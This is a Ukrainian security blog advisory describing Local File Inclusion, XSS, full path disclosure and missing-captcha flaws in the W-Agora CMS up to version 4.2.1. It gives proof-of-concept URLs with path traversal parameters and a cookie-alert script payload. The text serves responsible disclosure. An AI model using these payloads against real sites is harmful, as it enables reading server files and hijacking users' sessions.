LFI, IAA, XSS та FPD уразливості в W-Agora
15:20 18.03.201120.01.2011
У жовтні, 31.10.2010, я знайшов Local File Inclusion, Insufficient Anti-automation, Cross-Site Scripting та Full path disclosure уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я виявив на різних сайтах, що використовують дану систему. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в W-Agora.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
18.03.2011
Local File Inclusion:
http://site/register.php?bn=1 (в папці conf)
http://site/register.php?bn=..\1 (в будь-які папці - тільки на Windows-серверах)
Local File Inclusion:
Дана уразливість працює в 4.0, але атака в Windows не працює в 4.2.1.
http://site/rss.php3?site=1 (в папці conf)
http://site/rss.php3?site=\..\1 (в будь-які папці - тільки на Windows-серверах)
Insufficient Anti-automation:
http://site/register.php?site=support
В формі немає захисту від автоматизованих запитів (капчі).
XSS:
http://site/register.php?bn=%3Cbody%20onload=alert(document.cookie)%3E
XSS:
Дана уразливість працює в 4.0, але не працює в 4.2.1.
http://site/rss.php3?site=%3Cbody%20onload=alert(document.cookie)%3E
Full path disclosure:
http://site/rss.php?bn=1
Уразливі W-Agora 4.2.1 та попередні версії.